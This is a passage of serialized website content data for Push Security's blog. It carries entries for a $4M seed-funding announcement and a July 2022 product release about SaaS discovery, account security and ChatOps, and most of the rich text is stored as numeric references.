,{"data":341741,"marks":341742,"value":37,"nodeType":173},{},[341743],{"type":194},{"items":341745},[341746],{"sys":341747,"name":18399},{"id":18398},{"items":341749},[341750],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":341751},{"url":19129},{"items":341753},[341754],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":341755},{"url":282559},{"json":341757,"links":342048},{"data":341758,"content":341759,"nodeType":165},{},[341760,341766,341780,341786,341792,341798,341805,341811,341818,341843,341849,341855,341861,341867,341873,341879,341885,341891,341897,341903,341909,341915,341928,341934,341940,341946,341952,341958,341964,341970,341976,341982,341988,341993,341999,342021,342027,342033],{"data":341761,"content":341762,"nodeType":169},{},[341763],{"data":341764,"marks":341765,"value":323841,"nodeType":173},{},[],{"data":341767,"content":341768,"nodeType":178},{},[341769,341773,341776],{"data":341770,"marks":341771,"value":323849,"nodeType":173},{},[341772],{"type":1646},{"data":341774,"marks":341775,"value":39972,"nodeType":173},{},[],{"data":341777,"marks":341778,"value":323857,"nodeType":173},{},[341779],{"type":1646},{"data":341781,"content":341782,"nodeType":178},{},[341783],{"data":341784,"marks":341785,"value":323864,"nodeType":173},{},[],{"data":341787,"content":341788,"nodeType":178},{},[341789],{"data":341790,"marks":341791,"value":323871,"nodeType":173},{},[],{"data":341793,"content":341794,"nodeType":178},{},[341795],{"data":341796,"marks":341797,"value":323878,"nodeType":173},{},[],{"data":341799,"content":341800,"nodeType":178},{},[341801],{"data":341802,"marks":341803,"value":323886,"nodeType":173},{},[341804],{"type":370},{"data":341806,"content":341807,"nodeType":178},{},[341808],{"data":341809,"marks":341810,"value":323893,"nodeType":173},{},[],{"data":341812,"content":341813,"nodeType":169},{},[341814],{"data":341815,"marks":341816,"value":323901,"nodeType":173},{},[341817],{"type":370},{"data":341819,"content":341820,"nodeType":178},{},[341821,341824,341830,341833,341840],{"data":341822,"marks":341823,"value":323908,"nodeType":173},{},[],{"data":341825,"content":341826,"nodeType":186},{"uri":323911},[341827],{"data":341828,"marks":341829,"value":226380,"nodeType":173},{},[],{"data":341831,"marks":341832,"value":2936,"nodeType":173},{},[],{"data":341834,"content":341835,"nodeType":186},{"uri":323921},[341836],{"data":341837,"marks":341838,"value":323927,"nodeType":173},{},[341839],{"type":194},{"data":341841,"marks":341842,"value":323931,"nodeType":173},{},[],{"data":341844,"content":341845,"nodeType":178},{},[341846],{"data":341847,"marks":341848,"value":323938,"nodeType":173},{},[],{"data":341850,"content":341851,"nodeType":169},{},[341852],{"data":341853,"marks":341854,"value":323945,"nodeType":173},{},[],{"data":341856,"content":341857,"nodeType":178},{},[341858],{"data":341859,"marks":341860,"value":323952,"nodeType":173},{},[],{"data":341862,"content":341863,"nodeType":178},{},[341864],{"data":341865,"marks":341866,"value":323959,"nodeType":173},{},[],{"data":341868,"content":341869,"nodeType":178},{},[341870],{"data":341871,"marks":341872,"value":323966,"nodeType":173},{},[],{"data":341874,"content":341875,"nodeType":178},{},[341876],{"data":341877,"marks":341878,"value":323973,"nodeType":173},{},[],{"data":341880,"content":341881,"nodeType":178},{},[341882],{"data":341883,"marks":341884,"value":323980,"nodeType":173},{},[],{"data":341886,"content":341887,"nodeType":235},{},[341888],{"data":341889,"marks":341890,"value":323987,"nodeType":173},{},[],{"data":341892,"content":341893,"nodeType":178},{},[341894],{"data":341895,"marks":341896,"value":323994,"nodeType":173},{},[],{"data":341898,"content":341899,"nodeType":178},{},[341900],{"data":341901,"marks":341902,"value":324001,"nodeType":173},{},[],{"data":341904,"content":341905,"nodeType":178},{},[341906],{"data":341907,"marks":341908,"value":324008,"nodeType":173},{},[],{"data":341910,"content":341911,"nodeType":178},{},[341912],{"data":341913,"marks":341914,"value":324015,"nodeType":173},{},[],{"data":341916,"content":341917,"nodeType":178},{},[341918,341921,341925],{"data":341919,"marks":341920,"value":324022,"nodeType":173},{},[],{"data":341922,"marks":341923,"value":324027,"nodeType":173},{},[341924],{"type":1646},{"data":341926,"marks":341927,"value":324031,"nodeType":173},{},[],{"data":341929,"content":341930,"nodeType":178},{},[341931],{"data":341932,"marks":341933,"value":324038,"nodeType":173},{},[],{"data":341935,"content":341936,"nodeType":178},{},[341937],{"data":341938,"marks":341939,"value":324045,"nodeType":173},{},[],{"data":341941,"content":341942,"nodeType":169},{},[341943],{"data":341944,"marks":341945,"value":324052,"nodeType":173},{},[],{"data":341947,"content":341948,"nodeType":178},{},[341949],{"data":341950,"marks":341951,"value":324059,"nodeType":173},{},[],{"data":341953,"content":341954,"nodeType":178},{},[341955],{"data":341956,"marks":341957,"value":324066,"nodeType":173},{},[],{"data":341959,"content":341960,"nodeType":178},{},[341961],{"data":341962,"marks":341963,"value":324073,"nodeType":173},{},[],{"data":341965,"content":341966,"nodeType":235},{},[341967],{"data":341968,"marks":341969,"value":324080,"nodeType":173},{},[],{"data":341971,"content":341972,"nodeType":178},{},[341973],{"data":341974,"marks":341975,"value":324087,"nodeType":173},{},[],{"data":341977,"content":341978,"nodeType":178},{},[341979],{"data":341980,"marks":341981,"value":324094,"nodeType":173},{},[],{"data":341983,"content":341984,"nodeType":178},{},[341985],{"data":341986,"marks":341987,"value":324101,"nodeType":173},{},[],{"data":341989,"content":341992,"nodeType":312},{"target":341990},{"sys":341991},{"id":324106,"type":317,"linkType":318},[],{"data":341994,"content":341995,"nodeType":169},{},[341996],{"data":341997,"marks":341998,"value":324114,"nodeType":173},{},[],{"data":342000,"content":342001,"nodeType":178},{},[342002,342005,342009,342014,342018],{"data":342003,"marks":342004,"value":324121,"nodeType":173},{},[],{"data":342006,"marks":342007,"value":324126,"nodeType":173},{},[342008],{"type":370},{"data":342010,"marks":342011,"value":324132,"nodeType":173},{},[342012,342013],{"type":370},{"type":1646},{"data":342015,"marks":342016,"value":324137,"nodeType":173},{},[342017],{"type":370},{"data":342019,"marks":342020,"value":324141,"nodeType":173},{},[],{"data":342022,"content":342023,"nodeType":169},{},[342024],{"data":342025,"marks":342026,"value":324148,"nodeType":173},{},[],{"data":342028,"content":342029,"nodeType":178},{},[342030],{"data":342031,"marks":342032,"value":324155,"nodeType":173},{},[],{"data":342034,"content":342035,"nodeType":178},{},[342036,342039,342045],{"data":342037,"marks":342038,"value":324162,"nodeType":173},{},[],{"data":342040,"content":342041,"nodeType":186},{"uri":117883},[342042],{"data":342043,"marks":342044,"value":70282,"nodeType":173},{},[],{"data":342046,"marks":342047,"value":324172,"nodeType":173},{},[],{"entries":342049},{"hyperlink":342050,"inline":342051,"block":342052},[],[],[342053],{"sys":342054,"__typename":5345,"title":342055,"caption":342056,"layoutMode":118,"file":342057},{"id":324106},"Chatops - weak password","Example of ChatOps guiding employee to create a stronger password",{"url":342058,"width":342059,"height":342060},"https://images.ctfassets.net/y1cdw1ablpvd/2R08rdQb7l5zrm42p7b87w/04d81e9828396b68e2fe5f6fc4101b3c/borderround.png",844,222,"content:blog:building-a-culture-of-trust-to-secure-saas-together.json","blog/building-a-culture-of-trust-to-secure-saas-together.json","blog/building-a-culture-of-trust-to-secure-saas-together",{"_path":342065,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":342066,"ogImage":118,"summary":342068,"title":323816,"subtitle":118,"metaTitle":342098,"synopsis":323817,"hashTags":118,"publishedDate":323818,"slug":323819,"content":342099,"tagsCollection":342283,"relatedBlogPostsCollection":342287,"authorsCollection":342897,"_id":342901,"_type":5439,"_source":5440,"_file":342902,"_stem":342903,"_extension":5439},"/blog/push-security-announces-4m-seed-round-to-introduce-user-centric-approach",{"id":323060,"publishedAt":342067},"2025-08-06T14:32:58.254Z",{"json":342069},{"data":342070,"content":342071,"nodeType":165},{},[342072],{"data":342073,"content":342074,"nodeType":178},{},[342075,342079,342085,342088,342094],{"data":342076,"marks":342077,"value":342078,"nodeType":173},{},[],"Push Security announces it completed a $4 million seed round led by ",{"data":342080,"content":342081,"nodeType":186},{"uri":323624},[342082],{"data":342083,"marks":342084,"value":117772,"nodeType":173},{},[],{"data":342086,"marks":342087,"value":323633,"nodeType":173},{},[],{"data":342089,"content":342090,"nodeType":186},{"uri":323636},[342091],{"data":342092,"marks":342093,"value":323642,"nodeType":173},{},[],{"data":342095,"marks":342096,"value":342097,"nodeType":173},{},[],", including Jon Oberheide and Haroon Meer. With this funding, Push will continue to develop technology that equips employees to secure SaaS.","Push announces $4M seed round",{"json":342100,"links":342278},{"data":342101,"content":342102,"nodeType":165},{},[342103,342129,342135,342141,342147,342153,342159,342165,342181,342188,342194,342220,342227,342243,342250,342256,342272],{"data":342104,"content":342105,"nodeType":178},{},[342106,342109,342116,342119,342126],{"data":342107,"marks":342108,"value":323621,"nodeType":173},{},[],{"data":342110,"content":342111,"nodeType":186},{"uri":323624},[342112],{"data":342113,"marks":342114,"value":117772,"nodeType":173},{},[342115],{"type":194},{"data":342117,"marks":342118,"value":323633,"nodeType":173},{},[],{"data":342120,"content":342121,"nodeType":186},{"uri":323636},[342122],{"data":342123,"marks":342124,"value":323642,"nodeType":173},{},[342125],{"type":194},{"data":342127,"marks":342128,"value":323646,"nodeType":173},{},[],{"data":342130,"content":342131,"nodeType":178},{},[342132],{"data":342133,"marks":342134,"value":323653,"nodeType":173},{},[],{"data":342136,"content":342137,"nodeType":178},{},[342138],{"data":342139,"marks":342140,"value":323660,"nodeType":173},{},[],{"data":342142,"content":342143,"nodeType":178},{},[342144],{"data":342145,"marks":342146,"value":323667,"nodeType":173},{},[],{"data":342148,"content":342149,"nodeType":178},{},[342150],{"data":342151,"marks":342152,"value":323674,"nodeType":173},{},[],{"data":342154,"content":342155,"nodeType":178},{},[342156],{"data":342157,"marks":342158,"value":323681,"nodeType":173},{},[],{"data":342160,"content":342161,"nodeType":178},{},[342162],{"data":342163,"marks":342164,"value":323688,"nodeType":173},{},[],{"data":342166,"content":342167,"nodeType":178},{},[342168,342171,342178],{"data":342169,"marks":342170,"value":323695,"nodeType":173},{},[],{"data":342172,"content":342173,"nodeType":186},{"uri":97117},[342174],{"data":342175,"marks":342176,"value":323703,"nodeType":173},{},[342177],{"type":194},{"data":342179,"marks":342180,"value":323707,"nodeType":173},{},[],{"data":342182,"content":342183,"nodeType":178},{},[342184],{"data":342185,"marks":342186,"value":15112,"nodeType":173},{},[342187],{"type":370},{"data":342189,"content":342190,"nodeType":178},{},[342191],{"data":342192,"marks":342193,"value":323721,"nodeType":173},{},[],{"data":342195,"content":342196,"nodeType":178},{},[342197,342200,342207,342210,342217],{"data":342198,"marks":342199,"value":323728,"nodeType":173},{},[],{"data":342201,"content":342202,"nodeType":186},{"uri":97117},[342203],{"data":342204,"marks":342205,"value":323703,"nodeType":173},{},[342206],{"type":194},{"data":342208,"marks":342209,"value":323739,"nodeType":173},{},[],{"data":342211,"content":342212,"nodeType":186},{"uri":117883},[342213],{"data":342214,"marks":342215,"value":323747,"nodeType":173},{},[342216],{"type":194},{"data":342218,"marks":342219,"value":197,"nodeType":173},{},[],{"data":342221,"content":342222,"nodeType":178},{},[342223],{"data":342224,"marks":342225,"value":323758,"nodeType":173},{},[342226],{"type":370},{"data":342228,"content":342229,"nodeType":178},{},[342230,342233,342240],{"data":342231,"marks":342232,"value":37,"nodeType":173},{},[],{"data":342234,"content":342235,"nodeType":186},{"uri":323767},[342236],{"data":342237,"marks":342238,"value":117772,"nodeType":173},{},[342239],{"type":194},{"data":342241,"marks":342242,"value":323776,"nodeType":173},{},[],{"data":342244,"content":342245,"nodeType":178},{},[342246],{"data":342247,"marks":342248,"value":323784,"nodeType":173},{},[342249],{"type":370},{"data":342251,"content":342252,"nodeType":178},{},[342253],{"data":342254,"marks":342255,"value":323791,"nodeType":173},{},[],{"data":342257,"content":342258,"nodeType":178},{},[342259,342262,342269],{"data":342260,"marks":342261,"value":37,"nodeType":173},{},[],{"data":342263,"content":342264,"nodeType":186},{"uri":323800},[342265],{"data":342266,"marks":342267,"value":323806,"nodeType":173},{},[342268],{"type":194},{"data":342270,"marks":342271,"value":37,"nodeType":173},{},[],{"data":342273,"content":342274,"nodeType":178},{},[342275],{"data":342276,"marks":342277,"value":13836,"nodeType":173},{},[],{"entries":342279},{"hyperlink":342280,"block":342281,"inline":342282},[],[],[],{"items":342284},[342285],{"sys":342286,"name":117242},{"id":117241},{"items":342288},[342289,342591],{"__typename":1528,"sys":342290,"content":342291,"title":324173,"synopsis":324174,"hashTags":118,"publishedDate":323818,"slug":324175,"tagsCollection":342583,"authorsCollection":342587},{"id":323830},{"json":342292},{"data":342293,"content":342294,"nodeType":165},{},[342295,342301,342315,342321,342327,342333,342340,342346,342353,342378,342384,342390,342396,342402,342408,342414,342420,342426,342432,342438,342444,342450,342463,342469,342475,342481,342487,342493,342499,342505,342511,342517,342523,342528,342534,342556,342562,342568],{"data":342296,"content":342297,"nodeType":169},{},[342298],{"data":342299,"marks":342300,"value":323841,"nodeType":173},{},[],{"data":342302,"content":342303,"nodeType":178},{},[342304,342308,342311],{"data":342305,"marks":342306,"value":323849,"nodeType":173},{},[342307],{"type":1646},{"data":342309,"marks":342310,"value":39972,"nodeType":173},{},[],{"data":342312,"marks":342313,"value":323857,"nodeType":173},{},[342314],{"type":1646},{"data":342316,"content":342317,"nodeType":178},{},[342318],{"data":342319,"marks":342320,"value":323864,"nodeType":173},{},[],{"data":342322,"content":342323,"nodeType":178},{},[342324],{"data":342325,"marks":342326,"value":323871,"nodeType":173},{},[],{"data":342328,"content":342329,"nodeType":178},{},[342330],{"data":342331,"marks":342332,"value":323878,"nodeType":173},{},[],{"data":342334,"content":342335,"nodeType":178},{},[342336],{"data":342337,"marks":342338,"value":323886,"nodeType":173},{},[342339],{"type":370},{"data":342341,"content":342342,"nodeType":178},{},[342343],{"data":342344,"marks":342345,"value":323893,"nodeType":173},{},[],{"data":342347,"content":342348,"nodeType":169},{},[342349],{"data":342350,"marks":342351,"value":323901,"nodeType":173},{},[342352],{"type":370},{"data":342354,"content":342355,"nodeType":178},{},[342356,342359,342365,342368,342375],{"data":342357,"marks":342358,"value":323908,"nodeType":173},{},[],{"data":342360,"content":342361,"nodeType":186},{"uri":323911},[342362],{"data":342363,"marks":342364,"value":226380,"nodeType":173},{},[],{"data":342366,"marks":342367,"value":2936,"nodeType":173},{},[],{"data":342369,"content":342370,"nodeType":186},{"uri":323921},[342371],{"data":342372,"marks":342373,"value":323927,"nodeType":173},{},[342374],{"type":194},{"data":342376,"marks":342377,"value":323931,"nodeType":173},{},[],{"data":342379,"content":342380,"nodeType":178},{},[342381],{"data":342382,"marks":342383,"value":323938,"nodeType":173},{},[],{"data":342385,"content":342386,"nodeType":169},{},[342387],{"data":342388,"marks":342389,"value":323945,"nodeType":173},{},[],{"data":342391,"content":342392,"nodeType":178},{},[342393],{"data":342394,"marks":342395,"value":323952,"nodeType":173},{},[],{"data":342397,"content":342398,"nodeType":178},{},[342399],{"data":342400,"marks":342401,"value":323959,"nodeType":173},{},[],{"data":342403,"content":342404,"nodeType":178},{},[342405],{"data":342406,"marks":342407,"value":323966,"nodeType":173},{},[],{"data":342409,"content":342410,"nodeType":178},{},[342411],{"data":342412,"marks":342413,"value":323973,"nodeType":173},{},[],{"data":342415,"content":342416,"nodeType":178},{},[342417],{"data":342418,"marks":342419,"value":323980,"nodeType":173},{},[],{"data":342421,"content":342422,"nodeType":235},{},[342423],{"data":342424,"marks":342425,"value":323987,"nodeType":173},{},[],{"data":342427,"content":342428,"nodeType":178},{},[342429],{"data":342430,"marks":342431,"value":323994,"nodeType":173},{},[],{"data":342433,"content":342434,"nodeType":178},{},[342435],{"data":342436,"marks":342437,"value":324001,"nodeType":173},{},[],{"data":342439,"content":342440,"nodeType":178},{},[342441],{"data":342442,"marks":342443,"value":324008,"nodeType":173},{},[],{"data":342445,"content":342446,"nodeType":178},{},[342447],{"data":342448,"marks":342449,"value":324015,"nodeType":173},{},[],{"data":342451,"content":342452,"nodeType":178},{},[342453,342456,342460],{"data":342454,"marks":342455,"value":324022,"nodeType":173},{},[],{"data":342457,"marks":342458,"value":324027,"nodeType":173},{},[342459],{"type":1646},{"data":342461,"marks":342462,"value":324031,"nodeType":173},{},[],{"data":342464,"content":342465,"nodeType":178},{},[342466],{"data":342467,"marks":342468,"value":324038,"nodeType":173},{},[],{"data":342470,"content":342471,"nodeType":178},{},[342472],{"data":342473,"marks":342474,"value":324045,"nodeType":173},{},[],{"data":342476,"content":342477,"nodeType":169},{},[342478],{"data":342479,"marks":342480,"value":324052,"nodeType":173},{},[],{"data":342482,"content":342483,"nodeType":178},{},[342484],{"data":342485,"marks":342486,"value":324059,"nodeType":173},{},[],{"data":342488,"content":342489,"nodeType":178},{},[342490],{"data":342491,"marks":342492,"value":324066,"nodeType":173},{},[],{"data":342494,"content":342495,"nodeType":178},{},[342496],{"data":342497,"marks":342498,"value":324073,"nodeType":173},{},[],{"data":342500,"content":342501,"nodeType":235},{},[342502],{"data":342503,"marks":342504,"value":324080,"nodeType":173},{},[],{"data":342506,"content":342507,"nodeType":178},{},[342508],{"data":342509,"marks":342510,"value":324087,"nodeType":173},{},[],{"data":342512,"content":342513,"nodeType":178},{},[342514],{"data":342515,"marks":342516,"value":324094,"nodeType":173},{},[],{"data":342518,"content":342519,"nodeType":178},{},[342520],{"data":342521,"marks":342522,"value":324101,"nodeType":173},{},[],{"data":342524,"content":342527,"nodeType":312},{"target":342525},{"sys":342526},{"id":324106,"type":317,"linkType":318},[],{"data":342529,"content":342530,"nodeType":169},{},[342531],{"data":342532,"marks":342533,"value":324114,"nodeType":173},{},[],{"data":342535,"content":342536,"nodeType":178},{},[342537,342540,342544,342549,342553],{"data":342538,"marks":342539,"value":324121,"nodeType":173},{},[],{"data":342541,"marks":342542,"value":324126,"nodeType":173},{},[342543],{"type":370},{"data":342545,"marks":342546,"value":324132,"nodeType":173},{},[342547,342548],{"type":370},{"type":1646},{"data":342550,"marks":342551,"value":324137,"nodeType":173},{},[342552],{"type":370},{"data":342554,"marks":342555,"value":324141,"nodeType":173},{},[],{"data":342557,"content":342558,"nodeType":169},{},[342559],{"data":342560,"marks":342561,"value":324148,"nodeType":173},{},[],{"data":342563,"content":342564,"nodeType":178},{},[342565],{"data":342566,"marks":342567,"value":324155,"nodeType":173},{},[],{"data":342569,"content":342570,"nodeType":178},{},[342571,342574,342580],{"data":342572,"marks":342573,"value":324162,"nodeType":173},{},[],{"data":342575,"content":342576,"nodeType":186},{"uri":117883},[342577],{"data":342578,"marks":342579,"value":70282,"nodeType":173},{},[],{"data":342581,"marks":342582,"value":324172,"nodeType":173},{},[],{"items":342584},[342585],{"sys":342586,"name":117242},{"id":117241},{"items":342588},[342589],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":342590},{"url":282559},{"__typename":1528,"sys":342592,"content":342593,"title":332253,"synopsis":332254,"hashTags":118,"publishedDate":332255,"slug":332256,"tagsCollection":342889,"authorsCollection":342893},{"id":331914},{"json":342594},{"data":342595,"content":342596,"nodeType":165},{},[342597,342603,342633,342639,342646,342661,342666,342679,342684,342690,342695,342701,342707,342722,342730,342736,342742,342779,342784,342790,342805,342811,342817,342823,342829,342835,342841,342847,342853,342858,342882],{"data":342598,"content":342599,"nodeType":178},{},[342600],{"data":342601,"marks":342602,"value":331925,"nodeType":173},{},[],{"data":342604,"content":342605,"nodeType":250},{},[342606,342615,342624],{"data":342607,"content":342608,"nodeType":254},{},[342609],{"data":342610,"content":342611,"nodeType":178},{},[342612],{"data":342613,"marks":342614,"value":331938,"nodeType":173},{},[],{"data":342616,"content":342617,"nodeType":254},{},[342618],{"data":342619,"content":342620,"nodeType":178},{},[342621],{"data":342622,"marks":342623,"value":331948,"nodeType":173},{},[],{"data":342625,"content":342626,"nodeType":254},{},[342627],{"data":342628,"content":342629,"nodeType":178},{},[342630],{"data":342631,"marks":342632,"value":331958,"nodeType":173},{},[],{"data":342634,"content":342635,"nodeType":169},{},[342636],{"data":342637,"marks":342638,"value":331938,"nodeType":173},{},[],{"data":342640,"content":342641,"nodeType":178},{},[342642],{"data":342643,"marks":342644,"value":331972,"nodeType":173},{},[342645],{"type":1646},{"data":342647,"content":342648,"nodeType":178},{},[342649,342652,342658],{"data":342650,"marks":342651,"value":331979,"nodeType":173},{},[],{"data":342653,"content":342654,"nodeType":186},{"uri":285403},[342655],{"data":342656,"marks":342657,"value":331986,"nodeType":173},{},[],{"data":342659,"marks":342660,"value":39946,"nodeType":173},{},[],{"data":342662,"content":342665,"nodeType":312},{"target":342663},{"sys":342664},{"id":331994,"type":317,"linkType":318},[],{"data":342667,"content":342668,"nodeType":178},{},[342669,342672,342676],{"data":342670,"marks":342671,"value":332002,"nodeType":173},{},[],{"data":342673,"marks":342674,"value":332007,"nodeType":173},{},[342675],{"type":1646},{"data":342677,"marks":342678,"value":332011,"nodeType":173},{},[],{"data":342680,"content":342683,"nodeType":312},{"target":342681},{"sys":342682},{"id":332016,"type":317,"linkType":318},[],{"data":342685,"content":342686,"nodeType":178},{},[342687],{"data":342688,"marks":342689,"value":332024,"nodeType":173},{},[],{"data":342691,"content":342694,"nodeType":312},{"target":342692},{"sys":342693},{"id":332029,"type":317,"linkType":318},[],{"data":342696,"content":342697,"nodeType":178},{},[342698],{"data":342699,"marks":342700,"value":332037,"nodeType":173},{},[],{"data":342702,"content":342703,"nodeType":178},{},[342704],{"data":342705,"marks":342706,"value":332044,"nodeType":173},{},[],{"data":342708,"content":342709,"nodeType":178},{},[342710,342713,342719],{"data":342711,"marks":342712,"value":37,"nodeType":173},{},[],{"data":342714,"content":342715,"nodeType":186},{"uri":332053},[342716],{"data":342717,"marks":342718,"value":332058,"nodeType":173},{},[],{"data":342720,"marks":342721,"value":37,"nodeType":173},{},[],{"data":342723,"content":342726,"nodeType":169},{"target":342724},{"sys":342725},{"id":332066,"type":317,"linkType":318},[342727],{"data":342728,"marks":342729,"value":331948,"nodeType":173},{},[],{"data":342731,"content":342732,"nodeType":178},{},[342733],{"data":342734,"marks":342735,"value":332077,"nodeType":173},{},[],{"data":342737,"content":342738,"nodeType":178},{},[342739],{"data":342740,"marks":342741,"value":332084,"nodeType":173},{},[],{"data":342743,"content":342744,"nodeType":250},{},[342745,342761,342770],{"data":342746,"content":342747,"nodeType":254},{},[342748],{"data":342749,"content":342750,"nodeType":178},{},[342751,342754,342758],{"data":342752,"marks":342753,"value":332097,"nodeType":173},{},[],{"data":342755,"marks":342756,"value":332102,"nodeType":173},{},[342757],{"type":1646},{"data":342759,"marks":342760,"value":332106,"nodeType":173},{},[],{"data":342762,"content":342763,"nodeType":254},{},[342764],{"data":342765,"content":342766,"nodeType":178},{},[342767],{"data":342768,"marks":342769,"value":332116,"nodeType":173},{},[],{"data":342771,"content":342772,"nodeType":254},{},[342773],{"data":342774,"content":342775,"nodeType":178},{},[342776],{"data":342777,"marks":342778,"value":332126,"nodeType":173},{},[],{"data":342780,"content":342783,"nodeType":312},{"target":342781},{"sys":342782},{"id":332131,"type":317,"linkType":318},[],{"data":342785,"content":342786,"nodeType":178},{},[342787],{"data":342788,"marks":342789,"value":37,"nodeType":173},{},[],{"data":342791,"content":342792,"nodeType":178},{},[342793,342796,342802],{"data":342794,"marks":342795,"value":37,"nodeType":173},{},[],{"data":342797,"content":342798,"nodeType":186},{"uri":332147},[342799],{"data":342800,"marks":342801,"value":332058,"nodeType":173},{},[],{"data":342803,"marks":342804,"value":37,"nodeType":173},{},[],{"data":342806,"content":342807,"nodeType":169},{},[342808],{"data":342809,"marks":342810,"value":331958,"nodeType":173},{},[],{"data":342812,"content":342813,"nodeType":178},{},[342814],{"data":342815,"marks":342816,"value":332167,"nodeType":173},{},[],{"data":342818,"content":342819,"nodeType":178},{},[342820],{"data":342821,"marks":342822,"value":332174,"nodeType":173},{},[],{"data":342824,"content":342825,"nodeType":178},{},[342826],{"data":342827,"marks":342828,"value":332181,"nodeType":173},{},[],{"data":342830,"content":342831,"nodeType":178},{},[342832],{"data":342833,"marks":342834,"value":332188,"nodeType":173},{},[],{"data":342836,"content":342837,"nodeType":178},{},[342838],{"data":342839,"marks":342840,"value":332195,"nodeType":173},{},[],{"data":342842,"content":342843,"nodeType":178},{},[342844],{"data":342845,"marks":342846,"value":332202,"nodeType":173},{},[],{"data":342848,"content":342849,"nodeType":178},{},[342850],{"data":342851,"marks":342852,"value":332209,"nodeType":173},{},[],{"data":342854,"content":342857,"nodeType":312},{"target":342855},{"sys":342856},{"id":332214,"type":317,"linkType":318},[],{"data":342859,"content":342860,"nodeType":178},{},[342861,342864,342870,342873,342879],{"data":342862,"marks":342863,"value":332222,"nodeType":173},{},[],{"data":342865,"content":342866,"nodeType":186},{"uri":332225},[342867],{"data":342868,"marks":342869,"value":332230,"nodeType":173},{},[],{"data":342871,"marks":342872,"value":332234,"nodeType":173},{},[],{"data":342874,"content":342875,"nodeType":186},{"uri":332237},[342876],{"data":342877,"marks":342878,"value":323703,"nodeType":173},{},[],{"data":342880,"marks":342881,"value":332245,"nodeType":173},{},[],{"data":342883,"content":342884,"nodeType":178},{},[342885],{"data":342886,"marks":342887,"value":37,"nodeType":173},{},[342888],{"type":194},{"items":342890},[342891],{"sys":342892,"name":18399},{"id":18398},{"items":342894},[342895],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":342896},{"url":19129},{"items":342898},[342899],{"fullName":282557,"firstName":282557,"jobTitle":118,"profilePicture":342900},{"url":282559},"content:blog:push-security-announces-4m-seed-round-to-introduce-user-centric-approach.json","blog/push-security-announces-4m-seed-round-to-introduce-user-centric-approach.json","blog/push-security-announces-4m-seed-round-to-introduce-user-centric-approach",{"_path":342905,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":342906,"ogImage":118,"summary":342908,"title":332253,"subtitle":118,"metaTitle":342919,"synopsis":332254,"hashTags":118,"publishedDate":332255,"slug":332256,"tagsCollection":342920,"relatedBlogPostsCollection":342924,"authorsCollection":343115,"content":343119,"_id":343454,"_type":5439,"_source":5440,"_file":343455,"_stem":343456,"_extension":5439},"/blog/product-release-july-2022",{"id":331914,"publishedAt":342907},"2023-08-21T17:30:29.243Z",{"json":342909},{"data":342910,"content":342911,"nodeType":165},{},[342912],{"data":342913,"content":342914,"nodeType":178},{},[342915],{"data":342916,"marks":342917,"value":342918,"nodeType":173},{},[],"You can now use the Push platform to discover SaaS used in your organization, secure the accounts used on those SaaS platforms, find risky third-party integrations, and use ChatOps to solve problems at scale.","Push Security new product features for July 2022",{"items":342921},[342922],{"sys":342923,"name":18399},{"id":18398},{"items":342925},[342926],{"__typename":1528,"sys":342927,"content":342928,"title":323816,"synopsis":323817,"hashTags":118,"publishedDate":323818,"slug":323819,"tagsCollection":343107,"authorsCollection":343111},{"id":323060},{"json":342929},{"data":342930,"content":342931,"nodeType":165},{},[342932,342958,342964,342970,342976,342982,342988,342994,343010,343017,343023,343049,343056,343072,343079,343085,343101],{"data":342933,"content":342934,"nodeType":178},{},[342935,342938,342945,342948,342955],{"data":342936,"marks":342937,"value":323621,"nodeType":173},{},[],{"data":342939,"content":342940,"nodeType":186},{"uri":323624},[342941],{"data":342942,"marks":342943,"value":117772,"nodeType":173},{},[342944],{"type":194},{"data":342946,"marks":342947,"value":323633,"nodeType":173},{},[],{"data":342949,"content":342950,"nodeType":186},{"uri":323636},[342951],{"data":342952,"marks":342953,"value":323642,"nodeType":173},{},[342954],{"type":194},{"data":342956,"marks":342957,"value":323646,"nodeType":173},{},[],{"data":342959,"content":342960,"nodeType":178},{},[342961],{"data":342962,"marks":342963,"value":323653,"nodeType":173},{},[],{"data":342965,"content":342966,"nodeType":178},{},[342967],{"data":342968,"marks":342969,"value":323660,"nodeType":173},{},[],{"data":342971,"content":342972,"nodeType":178},{},[342973],{"data":342974,"marks":342975,"value":323667,"nodeType":173},{},[],{"data":342977,"content":342978,"nodeType":178},{},[342979],{"data":342980,"marks":342981,"value":323674,"nodeType":173},{},[],{"data":342983,"content":342984,"nodeType":178},{},[342985],{"data":342986,"marks":342987,"value":323681,"nodeType":173},{},[],{"data":342989,"content":342990,"nodeType":178},{},[342991],{"data":342992,"marks":342993,"value":323688,"nodeType":173},{},[],{"data":342995,"content":342996,"nodeType":178},{},[342997,343000,343007],{"data":342998,"marks":342999,"value":323695,"nodeType":173},{},[],{"data":343001,"content":343002,"nodeType":186},{"uri":97117},[343003],{"data":343004,"marks":343005,"value":323703,"nodeType":173},{},[343006],{"type":194},{"data":343008,"marks":343009,"value":323707,"nodeType":173},{},[],{"data":343011,"content":343012,"nodeType":178},{},[343013],{"data":343014,"marks":343015,"value":15112,"nodeType":173},{},[343016],{"type":370},{"data":343018,"content":343019,"nodeType":178},{},[343020],{"data":343021,"marks":343022,"value":323721,"nodeType":173},{},[],{"data":343024,"content":343025,"nodeType":178},{},[343026,343029,343036,343039,343046],{"data":343027,"marks":343028,"value":323728,"nodeType":173},{},[],{"data":343030,"content":343031,"nodeType":186},{"uri":97117},[343032],{"data":343033,"marks":343034,"value":323703,"nodeType":173},{},[343035],{"type":194},{"data":343037,"marks":343038,"value":323739,"nodeType":173},{},[],{"data":343040,"content":343041,"nodeType":186},{"uri":117883},[343042],{"data":343043,"marks":343044,"value":323747,"nodeType":173},{},[343045],{"type":194},{"data":343047,"marks":343048,"value":197,"nodeType":173},{},[],{"data":343050,"content":343051,"nodeType":178},{},[343052],{"data":343053,"marks":343054,"value":323758,"nodeType":173},{},[343055],{"type":370},{"data":343057,"content":343058,"nodeType":178},{},[343059,343062,343069],{"data":343060,"marks":343061,"value":37,"nodeType":173},{},[],{"data":343063,"content":343064,"nodeType":186},{"uri":323767},[343065],{"data":343066,"marks":343067,"value":117772,"nodeType":173},{},[343068],{"type":194},{"data":343070,"marks":343071,"value":323776,"nodeType":173},{},[],{"data":343073,"content":343074,"nodeType":178},{},[343075],{"data":343076,"marks":3430